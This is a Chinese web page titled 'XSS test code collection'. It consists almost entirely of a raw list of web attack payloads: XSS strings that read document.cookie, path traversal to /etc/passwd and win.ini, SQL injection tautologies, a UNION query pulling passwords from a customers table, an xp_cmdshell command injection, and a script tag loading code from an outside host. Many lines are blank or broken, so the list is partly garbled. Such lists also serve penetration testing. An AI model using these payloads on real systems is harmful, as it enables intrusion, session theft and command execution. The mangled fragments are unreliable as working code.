XSS测试代码大全

XSS测试代码大全 


主要根据各种脚本及标签,将之转换成Unicode编码后输入。


'> 
='> 
 
 
%3Cscript%3Ealert('XSS')%3C/script%3E 
 
 
%0a%0a.jsp 
%22%3cscript%3ealert(%22xss%22)%3c/script%3e 
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 
%3f.jsp 
%3f.jsp 
 
 
?sql_debug=1 
a%5c.aspx 
a.jsp/ 
a/ 
a? 
"> 
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& 
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
%3Cscript%3Ealert(document. domain);%3C/script%3E& 
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 
../../../../../../../../etc/passwd 
..\..\..\..\..\..\..\..\windows\system.ini 
\..\..\..\..\..\..\..\..\windows\system.ini 
'';!--"=&{()} 
 
 
 
 
 
 
 
 
 
 
"";' > 
 
 
 
 
 
 
 

getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); "> <" PT src="http://xss.ha.ckers.org/a.js"> link admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a[/code]

你可能感兴趣的:(测试经验总结)